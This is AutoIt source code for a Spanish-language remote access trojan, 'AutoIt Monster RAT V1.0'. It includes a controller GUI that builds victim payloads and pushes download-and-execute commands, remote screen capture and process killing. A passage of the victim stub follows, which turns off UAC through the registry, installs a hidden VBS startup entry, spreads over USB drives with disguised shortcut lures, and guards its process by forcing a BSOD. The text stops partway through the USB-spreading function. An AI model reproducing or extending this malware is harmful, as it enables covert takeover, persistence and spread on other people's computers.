Cliente:
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GuiListView.au3>
#include <GUIConstantsEx.au3>
#include <GuiStatusBar.au3>
#include <ListViewConstants.au3>
#include <StaticConstants.au3>
#include <TabConstants.au3>
#include <WindowsConstants.au3>
#region ### START Koda GUI section ### Form=c:\users\antonio\desktop\autoit spycam v1.0\forms\newclient.kxf
TrayTip('AutoIt Monster RAT V1.0', 'Bienvenido ' & @UserName, 1)
Opt("TCPTimeout", 0)
$Form1 = GUICreate("AutoIt Monster RAT V1.0", 822, 300, -1, -1)
$Panel = GUICtrlCreateTab(0, 0, 820, 280)
$TabSheet1 = GUICtrlCreateTabItem("Panel")
GUICtrlSetState(-1, $GUI_SHOW)
$ListView1 = GUICtrlCreateListView("LOCALIZACIÓN |IDENTIFICADOR |PUERTO |DIRECCIÓN IP |NOMBRE DE USUARIO |SISTEMA OPERATIVO |ANTIVIRUS ", 8, 32, 802, 214)
$Menu = GUICtrlCreateContextMenu($ListView1)
$Refresh = GUICtrlCreateMenuItem('Refrescar', $Menu)
$Disconect = GUICtrlCreateMenuItem('Desconectar', $Menu)
$Uninstall = GUICtrlCreateMenuItem('Desinstalar', $Menu)
$Down_Eje = GUICtrlCreateMenu('Descargar y Ejecutar', $Menu)
$Disk = GUICtrlCreateMenuItem('Desde Disco', $Down_Eje)
$URL = GUICtrlCreateMenuItem('Desde URL', $Down_Eje)
$Remote = GUICtrlCreateMenuItem('Escritorio Remoto', $Menu)
$ProcessView = GUICtrlCreateMenuItem('Listar Procesos', $Menu)
$OpenWeb = GUICtrlCreateMenuItem('Abrir Pagina WEB', $Menu)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button7 = GUICtrlCreateButton("Start", 8, 248, 75, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button8 = GUICtrlCreateButton("Stop", 88, 248, 75, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$TabSheet2 = GUICtrlCreateTabItem("Opciones de Escucha")
$Label1 = GUICtrlCreateLabel("Puerto de escucha", 8, 56, 122, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input1 = GUICtrlCreateInput("81", 136, 56, 57, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Button1 = GUICtrlCreateButton("+", 200, 56, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button2 = GUICtrlCreateButton("-", 232, 56, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Label2 = GUICtrlCreateLabel("Contraseña", 56, 96, 76, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input2 = GUICtrlCreateInput("", 136, 96, 121, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER, $ES_PASSWORD))
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Label8 = GUICtrlCreateLabel("Limite de conexiones", 8, 136, 141, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input9 = GUICtrlCreateInput("200", 152, 136, 57, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Button9 = GUICtrlCreateButton("+", 216, 136, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button10 = GUICtrlCreateButton("-", 248, 136, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$TabSheet3 = GUICtrlCreateTabItem("Crear Server")
$Label3 = GUICtrlCreateLabel("Direccion IP:", 160, 72, 85, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input3 = GUICtrlCreateInput("", 248, 72, 121, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Label4 = GUICtrlCreateLabel("Puerto:", 192, 104, 50, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Button3 = GUICtrlCreateButton("-", 344, 104, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Button4 = GUICtrlCreateButton("+", 312, 104, 27, 25)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Input4 = GUICtrlCreateInput("81", 248, 104, 57, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Label5 = GUICtrlCreateLabel("Identificador", 160, 144, 84, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input5 = GUICtrlCreateInput("", 248, 144, 121, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Label6 = GUICtrlCreateLabel("Contraseña:", 168, 184, 80, 20)
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Input6 = GUICtrlCreateInput("", 248, 184, 121, 22, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER, $ES_PASSWORD))
GUICtrlSetFont(-1, 10, 800, 0, "Arial")
$Checkbox2 = GUICtrlCreateCheckbox("Autoinicio con .VBS", 408, 72, 145, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Checkbox4 = GUICtrlCreateCheckbox("Desactivar UAC", 408, 100, 145, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Checkbox5 = GUICtrlCreateCheckbox("Delay", 408, 128, 49, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Input7 = GUICtrlCreateInput("1", 464, 128, 49, 22, BitOR($GUI_SS_DEFAULT_INPUT,$ES_CENTER))
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$label15 = GUICtrlCreateLabel("Segundos", 520, 128, 60, 25)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Button6 = GUICtrlCreateButton("Crear Server", 640, 232, 163, 33)
GUICtrlSetFont(-1, 9, 400, 0, "Arial")
$Checkbox1 = GUICtrlCreateCheckbox("Protejer proceso con BSOD", 408, 152, 250, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$Checkbox3 = GUICtrlCreateCheckbox("Spread USB", 408, 184, 97, 17)
GUICtrlSetFont(-1, 10, 400, 0, "Arial")
$TabSheet4 = GUICtrlCreateTabItem("About")
$Pic1 = GUICtrlCreatePic("Banner\Naker90.jpg", 16, 32, 276, 236)
$Label9 = GUICtrlCreateLabel("Coder: Naker90", 400, 144, 230, 46)
GUICtrlSetFont(-1, 26, 800, 0, "Tekton Pro")
GUICtrlSetBkColor(-1, 0xFFFFFF)
$Label10 = GUICtrlCreateLabel("AutoIt Monster RAT V1.0", 344, 88, 375, 46)
GUICtrlSetFont(-1, 26, 800, 0, "Tekton Pro")
GUICtrlSetBkColor(-1, 0xFFFFFF)
GUICtrlCreateTabItem("")
$StatusBar1 = _GUICtrlStatusBar_Create($Form1)
GUISetState(@SW_SHOW)
Local $sParts[4] = [80, 200, 370, 400]
_GUICtrlStatusBar_SetParts($StatusBar1, $sParts)
_GUICtrlStatusBar_SetText($StatusBar1, 'Esperando..', 0, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Servers Online: 0', 1, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Sistema operativo: ' & @OSVersion & ' ' & @OSArch, 2, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Puerto actual:', 3, 0)
Global $sListen
Global $sServers = 0
TCPStartup()
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
Exit
Case $Form1
Case $Button8 ;Stop
TCPShutdown()
_GUICtrlListView_DeleteAllItems($ListView1)
_GUICtrlStatusBar_SetText($StatusBar1, 'Esperando..', 0, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Servers Online: 0', 1, 0)
$sServers = 0
Case $Button7 ;Start
Global $sPuerto = GUICtrlRead($Input1)
Global $sPass = GUICtrlRead($Input2)
Global $sLimite = GUICtrlRead($Input9)
Global $sConections[$sLimite][2]
_GUICtrlStatusBar_SetText($StatusBar1, 'Escuchando..', 0, 0)
_GUICtrlStatusBar_SetText($StatusBar1, 'Puerto actual: ' & GUICtrlRead($Input1), 3, 0)
$sListen = TCPListen('0.0.0.0', $sPuerto, 200)
If $sListen = -1 Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'El puerto ' & $sPuerto & ' se encuentra en uso por otra aplicación')
TCPShutdown()
EndIf
Case $Button1
Local $sContenido = GUICtrlRead($Input1)
If $sContenido = '65535' Then
Else
Local $sSuma = $sContenido + 1
GUICtrlSetData($Input1, $sSuma)
EndIf
Case $Button2
Local $sContenido2 = GUICtrlRead($Input1)
If $sContenido2 = '0' Then
Else
Local $sResta = $sContenido2 - 1
GUICtrlSetData($Input1, $sResta)
EndIf
Case $Button4
Local $sContenido = GUICtrlRead($Input4)
If $sContenido = '65535' Then
Else
Local $sSuma = $sContenido + 1
GUICtrlSetData($Input4, $sSuma)
EndIf
Case $Button3
Local $sContenido2 = GUICtrlRead($Input4)
If $sContenido2 = '0' Then
Else
Local $sResta = $sContenido2 - 1
GUICtrlSetData($Input4, $sResta)
EndIf
Case $Button9
Local $sContenido = GUICtrlRead($Input9)
Local $sSuma = $sContenido + 1
GUICtrlSetData($Input9, $sSuma)
Case $Button10
Local $sContenido2 = GUICtrlRead($Input9)
If $sContenido2 = '0' Then
Else
Local $sResta = $sContenido2 - 1
GUICtrlSetData($Input9, $sResta)
EndIf
Case $Refresh
Local $sSelected = _ItemSelect()
_GUICtrlListView_DeleteItem($ListView1, $sSelected)
TCPSend($sConections[$sSelected][0], 'Refrescar')
Case $Disconect
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'Disconect')
Case $Uninstall
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'Uninstall')
Case $Disk
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'Disk')
Local $sFile = FileOpenDialog('Seleccione el archivo a ejecutar', @ScriptDir, 'ALL (*.*)')
Local $sEXT = StringSplit($sFile, '.', 1)
Local $sEnd = UBound($sEXT) - 1
TCPSend($sConections[$sSelected][0], $sEXT[$sEnd])
Local $sFileopen = FileOpen($sFile)
While 1
Local $sData = FileRead($sFileopen, 2048)
If @error Then ExitLoop
TCPSend($sConections[$sSelected][0], $sData)
If @error Then ExitLoop
WEnd
FileClose($sFileopen)
TCPSend($sConections[$sSelected][0], 'OK')
Case $URL
Local $sURL
Local $sSelected = _ItemSelect()
_DownURL()
TCPSend($sConections[$sSelected][0], 'URL')
Local $sEXT = StringSplit($sURL, '.', 1)
Local $sEnd = UBound($sEXT) - 1
TCPSend($sConections[$sSelected][0], $sEXT[$sEnd])
Local $sCifrado = Cifrado_Simple_Cifrar($sURL, 54)
TCPSend($sConections[$sSelected][0], $sCifrado)
Case $Remote
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'Remote')
_EscritorioRemoto()
Case $ProcessView
Local $sSelected = _ItemSelect()
_ProcessView()
Case $OpenWeb
Local $sSelected = _ItemSelect()
TCPSend($sConections[$sSelected][0], 'WEB')
_PaginaWeb()
Case $Button6
Local $sIP = GUICtrlRead($Input3)
Local $sPort = GUICtrlRead($Input4)
Local $sID = GUICtrlRead($Input5)
Local $Pass = GUICtrlRead($Input6)
Local $sCode = '#NotrayIcon' & @CRLF & '#include <ScreenCapture.au3>' & @CRLF & '#include <Security.au3>' & @CRLF & '#include <File.au3>' & @CRLF & '#include <GDIPlus.au3>' & @CRLF & '#RequireAdmin' & @CRLF & 'TCPStartup()' & @CRLF & _
'Local $sIP = TCPNameToIP(' & Chr(34) & $sIP & Chr(34) & ')' & @CRLF & 'Local $sPuerto = ' & $sPort & @CRLF & 'Local $sPass = ' & Chr(34) & $Pass & Chr(34) & @CRLF & _
'Local $sServerName = ' & Chr(34) & $sID & Chr(34) & @CRLF & 'Global $sConect' & @CRLF
If GUICtrlRead($Checkbox2) = 1 Then
Local $sCode2 = 'Local $Autorun = 1' & @CRLF
Else
Local $sCode2 = 'Local $Autorun = 0' & @CRLF
EndIf
If GUICtrlRead($Checkbox1) = 1 Then
Local $sCode3 = 'Local $sAtis = 1' & @CRLF
Else
Local $sCode3 = 'Local $sAtis = 0' & @CRLF
EndIf
If GUICtrlRead($Checkbox3) = 1 Then
Local $sCode4 = 'Local $sSpread = 1' & @CRLF
Else
Local $sCode4 = 'Local $sSpread = 0' & @CRLF
EndIf
If GUICtrlRead($Checkbox4) = 1 Then
Local $sCode5 = 'Local $sUAC = 1' & @CRLF
Else
Local $sCode5 = 'Local $sUAC = 0' & @CRLF
EndIf
if GUICtrlRead($Checkbox5) = 1 then
Local $sCode6 = 'Local $sDelay = 1' & @CRLF & 'Local $sSeg = ' & GUICtrlRead($Input7) & ' * 1000'
Else
Local $sCode6 = 'Local $sDelay = 0' & @CRLF & 'Local $sSeg'
EndIf
Local $sServer = FileRead('Compilacion\Server.au3')
Local $sNewServer = FileOpen('Compilacion\New Server.au3', 17)
FileWrite($sNewServer, $sCode)
FileWrite($sNewServer, $sCode2)
FileWrite($sNewServer, $sCode3)
FileWrite($sNewServer, $sCode4)
FileWrite($sNewServer, $sCode5)
FileWrite($sNewServer, $sCode6)
FileWrite($sNewServer, $sServer)
FileClose($sNewServer)
Sleep(1000)
Local $in = '/in ' & Chr(34) & @ScriptDir & '\Compilacion\New Server.au3' & Chr(34) & ' '
Local $out = '/out ' & Chr(34) & 'New Server.exe' & Chr(34) & ' '
Local $systemtipe = '/x86 '
ShellExecute('Compilacion\Aut2Exe.exe', $in & $out & '/nopack /x86 /gui')
Sleep(1000)
FileDelete('Compilacion\New Server.au3')
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Server Creado con exito')
EndSwitch
_Connect()
WEnd
Func Cifrado_Simple_Cifrar($texto, $numero)
$Resultado = ''
For $i = 1 To StringLen($texto)
$Resultado = $Resultado & Chr(Asc(StringMid($texto, $i)) + $numero)
Next
Return $Resultado
EndFunc ;==>Cifrado_Simple_Cifrar
Func _Connect()
Local $sAccept = TCPAccept($sListen)
If $sAccept <> -1 Then
Do
Local $sRev = TCPRecv($sAccept, 1024)
Until StringInStr($sRev, 'OK')
Local $sSplit = StringSplit($sRev, '|', 1)
If $sSplit[8] = $sPass Then
Local $sLocalizacion = GetLang($sSplit[1])
$sConections[$sServers][0] = $sAccept
$sConections[$sServers][1] = GUICtrlCreateListViewItem($sLocalizacion & '|' & $sSplit[2] & '|' & $sSplit[3] & '|' & $sSplit[4] & '|' & $sSplit[5] & '|' & $sSplit[6] & '|' & $sSplit[7], $ListView1)
$sServers += 1
_GUICtrlStatusBar_SetText($StatusBar1, 'Servers Online: ' & $sServers, 1, 0)
SoundPlay('Sound\Monster.mp3', 0)
TrayTip('AutoIt Monster RAT V1.0', 'Nuevo Server Online: ' & $sSplit[4], 0, 1)
EndIf
EndIf
EndFunc ;==>_Connect
Func _ItemSelect()
Local $sInput
For $i = 0 To $sServers
Local $sGetItem = _GUICtrlListView_GetItemSelected($ListView1, $i)
If $sGetItem = True Then
$sInput = $i
EndIf
Next
Return $sInput
EndFunc ;==>_ItemSelect
Func GetLang($sOsLang)
Local $sLang[222] = ['China', 'Arabia Saudi', 'Bulgaria', 'España', 'China', 'Republica Checa', 'Dinamarca', 'Alemania', 'Gracia', 'Estados Unidos', 'España', 'Finlandia', 'Francia', 'Israel', 'Hungria', 'Islandia', 'Italia', 'Japon', 'Korea', 'Paises Bajos', _
'Noruega', 'Polonia', 'Brasil', 'Suiza', 'Rumania', 'Rusia', 'Croacia', 'Eslovaquia', 'Albania', 'Suecia', 'Tailandia', 'Turquia', 'Pakistan', 'Indonesia', 'Ucrania', 'Bielorrusia', 'Eslovenia', 'Estonia', 'Letonia', 'Lituania', _
'Tayikistán', 'Iran', 'Vietnam', 'Armenia', 'Azerbaiyán', 'Pais Vasco', 'Alemania', 'Macedonia', 'Sudafrica', 'Sudafrica', 'Sudafrica', 'Sudafrica', 'Georgia', 'Islas Feroe', 'India', 'Malta', 'Noruega', 'Malasia', 'Kazajstán', 'Kirguistán', _
'Kenia', 'Turkmenistán', 'Uzbekistán', 'Rusia', 'Bangladesh', 'India', 'India', 'India', 'India', 'India', 'India', 'India', 'India', 'Mongolia', 'China', 'Reino Unido', 'Camboya', 'Lao', 'España', _
'India', 'Siria', 'Lanka', 'Cherokee', 'Canada', 'Etiopia', 'Nepal', 'Paises Bajos', 'Afganistán', 'Filipinas', 'Maldivas', 'Nigeria', 'Nigeria', 'Bolivia', 'Sudafrica', 'Rusia', 'Luxemburgo', 'Groenlandia', _
'Nigeria', 'Etiopia', 'Estados Unidos', 'China', 'Chile', 'Canada', 'Francia', 'China', 'Nueva Zelanda', 'Francia', 'Francia', 'Francia', 'Rusia', 'Guatemala', 'Ruanda', 'Senegal', 'Afganistán', 'Reino Unido', 'Iraq', 'Iraq', _
'España', 'China', 'Suiza', 'Reino Unido', 'Mexico', 'Belgica', 'Suiza', 'Belgica', 'Noruega', 'Portugal', 'Serbia y Montenegro', 'Finlandia', 'Urdu', 'Azerbaiyán', 'Alemania', 'Botswana', 'Suecia', 'Irlanda', 'Brunei Darassalam', 'Uzbekistán', _
'Bangladesh', 'Pakistan', 'Sri Lanka', 'Mongolia', 'Pakistan', 'Canada', 'Argelia', 'Senegal', 'Ecuador', 'Egipto', 'Hong Kong', 'Austria', 'Australia', 'España', 'Canada', 'Serbia y Montenegro', 'Finlandia', 'Peru', 'Libia', _
'Singapur', 'Luxemburgo', 'Canada', 'Guatemala', 'Suiza', 'Bosnia y Herzegovina', 'Noruega', 'Marruecos', 'Argelia', 'China', 'Liechtenstein', 'Nueva Zelanda', 'Costa Rica', 'Luxemburgo', 'Bosnia y Herzegovina', 'Suecia', 'Marruecos', 'Irlanda', 'Panamá', 'Monaco', _
'Bosnia y Herzegovina', 'Noruega', 'Tunez', 'Sudáfrica', 'República Dominicana', 'Bosnia y Herzegovina', 'Suecia', 'Omán', 'Jamaica', 'Venezuela', 'Bosnia y Herzegovina', 'Finlandia', 'Yemen', 'El Caribe', 'Colombia', 'Serbia', 'Finlandia', 'Siria', 'Belice', 'Peru', _
'Servia', 'Jordan', 'Trinidad y Tobago', 'Argentina', 'Montenegro', 'Libano', 'Zimbabwe', 'Ecuador', 'Montenegro', 'Kuwait', 'Filipinas', 'Chile', 'Emiratos', 'Bahrain', 'Paraguay', 'Qatar', 'India', 'Bolivia', 'Malasia', 'El Salvador', _
'Singapur', 'Honduras', 'Nicaragua', 'Puerto Rico', ' Estados Unidos', 'China']
Local $sHEX[222] = ['0004', '0401', '0402', '0403', '0404', '0405', '0406', '0407', '0408', '0409', '040A', '040B', '040C', '040D', '040E', '040F', '0410', '0411', '0412', '0413', _
'0414', '0415', '0416', '0417', '0418', '0419', '041A', '041B', '041C', '041D', '041E', '041F', '0420', '0421', '0422', '0423', '0424', '0425', '0426', '0427', _
'0428', '0429', '042A', '042B', '042C', '042D', '042E', '042F', '0432', '0434', '0435', '0436', '0437', '0438', '0439', '043A', '043B', '043e', '043F', '0440', _
'0441', '0442', '0443', '0444', '0445', '0446', '0447', '0448', '0449', '044A', '044B', '044E', '044F', '0450', '0451', '0452', '0453', '0454', '0456', _
'0457', '045A', '045B', '045C', '045D', '045E', '0461', '0462', '0463', '0464', '0465', '0468', '046A', '046B', '046C', '046D', '046E', '046F', _
'0470', '0473', '0475', '0478', '047A', '047C', '047E', '0480', '0481', '0482', '0483', '0484', '0485', '0486', '0487', '0488', '048C', '0491', '0492', '0801', _
'0803', '0804', '0807', '0809', '080A', '080C', '0810', '0813', '0814', '0816', '081A', '081D', '0820', '082C', '082E', '0832', '083B', '083C', '083E', '0843', _
'0845', '0846', '0849', '0850', '0859', '085D', '085F', '0867', '086B', '0C01', '0C04', '0C07', '0C09', '0C0A', '0C0C', '0C1A', '0C3B', '0C6B', '1001', _
'1004', '1007', '1009', '100A', '100C', '101A', '103B', '105F', '1401', '1404', '1407', '1409', '140A', '140C', '141A', '143B', '1801', '1809', '180A', '180C', _
'180A', '183B', '1C01', '1c09', '1C0A', '1C1A', '1C3B', '2001', '2009', '200A', '201A', '203B', '2401', '2409', '240A', '241A', '243B', '2801', '2809', '280A', _
'281A', '2C01', '2C09', '2C0A', '2C1A', '3001', '3009', '300A', '301A', '3401', '3409', '340A', '3801', '380A', '3C01', '3C0A', '4001', '4009', '400A', '4409', _
'440A', '4809', '480A', '4C0A', '500A', '540A']
For $i = 0 To 222
If StringInStr($sHEX[$i], $sOsLang) Then
Return $sLang[$i]
EndIf
Next
EndFunc ;==>GetLang
Func _DownURL()
#region ### START Koda GUI section ### Form=C:\Users\Antonio\Desktop\AutoIt Monster RAT V1.0\Forms\URL.kxf
$FormURL = GUICreate("AutoIt Monster RAT V1.0 // URL", 412, 69, -1, -1)
$InURL = GUICtrlCreateInput("", 8, 8, 393, 21, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
$Pegar = GUICtrlCreateButton("Pegar", 8, 32, 75, 25)
$Limpiar = GUICtrlCreateButton("Limpiar", 88, 32, 75, 25)
$Comprobar = GUICtrlCreateButton("Comprobar", 168, 32, 75, 25)
$Enviar = GUICtrlCreateButton("Enviar", 248, 32, 155, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
GUIDelete($FormURL)
ExitLoop
Case $Pegar
GUICtrlSetData($InURL, ClipGet())
Case $Limpiar
GUICtrlSetData($InURL, '')
Case $Comprobar
If GUICtrlRead($InURL) = '' Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Introduzca primero la URL')
Else
ShellExecute(GUICtrlRead($InURL))
EndIf
Case $Enviar
If GUICtrlRead($InURL) = '' Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Introduzca primero la URL')
Else
$sURL = GUICtrlRead($InURL)
GUIDelete($FormURL)
ExitLoop
EndIf
EndSwitch
WEnd
EndFunc ;==>_DownURL
Func _EscritorioRemoto()
#region ### START Koda GUI section ### Form=c:\users\antonio\desktop\autoit monster rat v1.0\forms\escritorioremoto.kxf
Global $FormRemote = GUICreate("AutoIt Monster RAT V1.0 // Escritorio Remoto", 1170, 598, -1, -1)
Global $Pic1 = GUICtrlCreatePic("", 8, 8, 1156, 556)
$Start = GUICtrlCreateButton("Start", 8, 568, 195, 25)
$Stop = GUICtrlCreateLabel("Presione ESC para dejar de capturar la pantalla", 208, 568, 195, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
GUIDelete($FormRemote)
ExitLoop
Case $Start
AdlibRegister('_RemoteDesktop', 100)
EndSwitch
WEnd
EndFunc ;==>_EscritorioRemoto
Func _Exit()
TCPSend($sConections[$sSelected][0], 'Fin')
AdlibUnRegister('_RemoteDesktop')
EndFunc ;==>_Exit
Func _RemoteDesktop()
HotKeySet('{ESC}', '_Exit')
Local $sImage = FileOpen(@TempDir & '\003.jpg', 18)
Do
Local $sData = TCPRecv($sConections[$sSelected][0], 2048)
If @error Then ExitLoop 2
If StringRight($sData, 2) = 'OK' Then ExitLoop
FileWrite($sImage, $sData)
Until False
FileClose($sImage)
GUICtrlSetImage($Pic1, @TempDir & '\003.jpg')
EndFunc ;==>_RemoteDesktop
Func _ProcessView()
#region ### START Koda GUI section ### Form=c:\users\antonio\desktop\autoit monster rat v1.0\forms\processview.kxf
$FormProcess = GUICreate("AutoIt Monster RAT V1.0 // Listado de procesos", 406, 341, -1, -1)
$ListProcess = GUICtrlCreateListView("PROCESO |PID ", 8, 8, 250, 326)
$ProcessMenu = GUICtrlCreateContextMenu($ListProcess)
$ProcessKill = GUICtrlCreateMenuItem('Terminar Proceso', $ProcessMenu)
$ProcessBSOD = GUICtrlCreateMenuItem('Terminar Proceso con BSOD', $ProcessMenu)
$StartProcess = GUICtrlCreateButton("Start", 264, 8, 139, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
GUIDelete($FormProcess)
ExitLoop
Case $StartProcess
TCPSend($sConections[$sSelected][0], 'Process')
Do
Local $sProcessREV = TCPRecv($sConections[$sSelected][0], 3072)
Sleep(250)
Until StringRight($sProcessREV, 2) = 'OK'
Local $sSplit = StringSplit($sProcessREV, '@', 1)
Local $sTotal = UBound($sSplit) - 2
For $si = 1 To $sTotal
GUICtrlCreateListViewItem($sSplit[$si], $ListProcess)
Next
Case $ProcessBSOD
TCPSend($sConections[$sSelected][0], 'KillBSOD')
Local $sInput
For $i = 0 To _GUICtrlListView_GetItemCount($ListProcess)
Local $sGetItem = _GUICtrlListView_GetItemSelected($ListProcess, $i)
If $sGetItem = True Then
$sInput = $i
EndIf
Next
Local $sItem = _GUICtrlListView_GetItemText($ListProcess, $sInput)
TCPSend($sConections[$sSelected][0], $sItem)
Case $ProcessKill
TCPSend($sConections[$sSelected][0], 'Kill')
Local $sInput
For $i = 0 To _GUICtrlListView_GetItemCount($ListProcess)
Local $sGetItem = _GUICtrlListView_GetItemSelected($ListProcess, $i)
If $sGetItem = True Then
$sInput = $i
EndIf
Next
Local $sItem = _GUICtrlListView_GetItemText($ListProcess, $sInput)
TCPSend($sConections[$sSelected][0], $sItem)
EndSwitch
WEnd
EndFunc ;==>_ProcessView
Func _PaginaWeb()
#region ### START Koda GUI section ### Form=C:\Users\Antonio\Desktop\AutoIt Monster RAT V1.0\Forms\PaginaWEB.kxf
$FormWEB = GUICreate("AutoIt Monster RAT V1.0 // Abrir Pagina WEB", 492, 68, -1, -1)
$InWEB = GUICtrlCreateInput("", 8, 8, 473, 21, BitOR($GUI_SS_DEFAULT_INPUT, $ES_CENTER))
$WEBPegar = GUICtrlCreateButton("Pegar", 8, 32, 75, 25)
$WEBLimpiar = GUICtrlCreateButton("Limpiar", 88, 32, 75, 25)
$WEBProbar = GUICtrlCreateButton("Probar WEB", 168, 32, 75, 25)
$WEBEnviar = GUICtrlCreateButton("Enviar", 248, 32, 235, 25)
GUISetState(@SW_SHOW)
#endregion ### END Koda GUI section ###
While 1
$nMsg = GUIGetMsg()
Switch $nMsg
Case $GUI_EVENT_CLOSE
GUIDelete($FormWEB)
ExitLoop
Case $WEBPegar
GUICtrlSetData($InWEB, ClipGet())
Case $WEBLimpiar
GUICtrlSetData($InWEB, '')
Case $WEBProbar
If GUICtrlRead($InWEB) = '' Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Introduzca primero la Pagina WEB')
Else
ShellExecute(GUICtrlRead($InWEB))
EndIf
Case $WEBEnviar
If GUICtrlRead($InWEB) = '' Then
MsgBox(64, 'AutoIt Monster RAT V1.0', 'Introduzca primero la Pagina WEB')
Else
TCPSend($sConections[$sSelected][0], GUICtrlRead($InWEB))
EndIf
EndSwitch
WEnd
EndFunc ;==>_PaginaWeb#NotrayIcon
#include <ScreenCapture.au3>
#include <Security.au3>
#include <File.au3>
#include <GDIPlus.au3>
#RequireAdmin
TCPStartup()
Local $sIP = TCPNameToIP("127.0.0.1")
Local $sPuerto = 81
Local $sPass = ""
Local $sServerName = "Naker90"
Global $sConect
Local $Autorun = 0
Local $sAtis = 0
Local $sSpread = 0
Local $sUAC = 0
Local $sDelay = 0
Local $sSeg = ''
if $sDelay = 1 then
Sleep($sSeg)
EndIf
if $sUAC = 1 then
RegWrite('HKLM\SOFTWARE\Microsoft\Security Center', 'UACDisableNotify', 'REG_DWORD', '0')
RegWrite('HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System', 'EnableLUA', 'REG_DWORD', '0')
EndIf
if $sSpread = 1 then
Spread_USB(0)
EndIf
if $sAtis = 1 then
ProtectProcess_BSOD(@AutoItExe, 1)
EndIf
if $Autorun = 1 then
Local $sFileopen = FileOpen(@StartupDir & '\Autorun.vbs', 18)
Local $sStart = 'Set wshShell = CreateObject( "WScript.Shell" )' & @CRLF & 'wshShell.run """" & ' & chr(34) & @ScriptFullPath & chr(34) & ' & """"'
FileWrite($sFileopen, $sStart)
FileClose($sFileopen)
DllCall('Kernel32.dll', 'int', 'SetFileAttributes', 'str', @StartupDir & '\Autorun.vbs', 'dword', 0x2)
EndIf
Func Spread_USB($sHideOrDelete)
Local $sUSB = Detect_USB()
If $sUSB = '' Then
Exit
Else
Local $sArray = StringSplit($sUSB, '@')
For $i = 0 To UBound($sArray) - 1
If Not FileExists($sArray[$i] & '\' & @ScriptName) Then
Local $sFiles = _FileListToArray($sArray[$i] & '\')
For $si = 1 To UBound($sFiles) - 1
_ExtractIcon($sArray[$i] & '\' & $sFiles[$si], $sArray[$i] & '\Icon' & $si & '.ico', 1)
DllCall('Kernel32.dll', 'int', 'SetFileAttributes', 'str', $sArray[$i] & '\Icon' & $si & '.ico', 'dword', 0x2)
FileCreateShortcut($sArray[$i] & '\' & @ScriptName, $sArray[$i] & '\' & $sFiles[$si] & '.lnk', '', '', '', $sArray[$i] & '\Icon' & $si & '.ico')
If $sHideOrDelete <> 0 Then
